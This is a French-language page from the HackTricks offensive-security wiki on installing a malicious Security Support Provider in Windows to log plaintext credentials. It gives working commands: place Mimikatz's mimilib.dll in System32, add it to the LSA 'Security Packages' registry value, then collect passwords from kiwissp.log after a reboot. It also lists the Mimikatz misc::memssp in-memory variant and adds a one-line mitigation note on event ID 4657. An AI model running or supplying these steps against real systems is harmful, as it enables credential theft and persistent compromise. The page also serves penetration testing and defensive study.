3.2 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Travaillez-vous dans une entreprise de cybersécurité? Voulez-vous voir votre entreprise annoncée dans HackTricks? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF? Consultez les PLANS D'ABONNEMENT!
-
Découvrez The PEASS Family, notre collection exclusive de NFTs
-
Obtenez le swag officiel PEASS & HackTricks
-
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
-
Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
SSP personnalisé
Apprenez ce qu'est un SSP (Security Support Provider) ici.
Vous pouvez créer votre propre SSP pour capturer en clair les informations d'identification utilisées pour accéder à la machine.
Mimilib
Vous pouvez utiliser le binaire mimilib.dll fourni par Mimikatz. Cela enregistrera dans un fichier toutes les informations d'identification en clair.
Déposez la dll dans C:\Windows\System32\
Obtenez une liste des packages de sécurité LSA existants:
{% code title="attaquant@cible" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
Ajoutez mimilib.dll à la liste des fournisseurs de support de sécurité (Security Packages) :
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Et après un redémarrage, toutes les informations d'identification peuvent être trouvées en clair dans C:\Windows\System32\kiwissp.log
En mémoire
Vous pouvez également injecter cela en mémoire directement en utilisant Mimikatz (notez que cela peut être un peu instable / ne pas fonctionner):
privilege::debug
misc::memssp
Cela ne survivra pas aux redémarrages.
Atténuation
ID d'événement 4657 - Audit de la création/modification de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages